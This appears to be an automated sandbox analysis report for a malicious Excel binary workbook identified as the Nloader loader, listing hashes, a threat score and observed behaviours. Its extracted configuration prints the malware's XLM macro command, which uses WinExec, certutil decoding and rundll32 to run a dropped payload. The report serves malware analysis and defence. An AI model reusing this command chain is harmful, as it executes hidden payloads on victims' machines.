Overview

overview

10

Static

static

8

WIN7(5)

windows7_x64

10

Resubmissions

15/05/2021, 06:30 UTC

210515-lxdxev1lpn 10

15/05/2021, 06:01 UTC

210515-2knl4q95bs 10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    test.xlsb

  • Size

    254KB

  • Sample

    210515-lxdxev1lpn

  • MD5

    dc37192b5c4c8c4f94c73c18ce5e3829

  • SHA1

    0aa6bb11a11dade2269d90b2781ed0a517362012

  • SHA256

    db53f42e13d2685bd34dbc5c79fad637c9344e72e210ca05504420874e98c2a6

  • SHA512

    3e8b179d8521fb33a46eeeca74bbda7a4e8a32f47b6195b17d62664dd2e31716261a61a495857ed08dbbc001a9eab8adec7133921179eb3df66c53e18c586d9a

Score
10/10
nloaderloadermacroxlm

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("Kernel32", "WinExec", "CJ", "cmd.exe /c certutil -decode %PUBLIC%\130486.dot %PUBLIC%\130486.pgj && rundll32 %PUBLIC%\130486.pgj,DF1", 0)

Targets

    • Target

      test.xlsb

    • Size

      254KB

    • MD5

      dc37192b5c4c8c4f94c73c18ce5e3829

    • SHA1

      0aa6bb11a11dade2269d90b2781ed0a517362012

    • SHA256

      db53f42e13d2685bd34dbc5c79fad637c9344e72e210ca05504420874e98c2a6

    • SHA512

      3e8b179d8521fb33a46eeeca74bbda7a4e8a32f47b6195b17d62664dd2e31716261a61a495857ed08dbbc001a9eab8adec7133921179eb3df66c53e18c586d9a

    Score
    10/10
    nloaderloader

    • Nloader

      Simple loader that includes the keyword 'campo' in the URL used to download other families.

      loadernloader

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Nloader Payload

    • Loads dropped DLL

    behavioral1

MITRE ATT&CK Enterprise v6

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.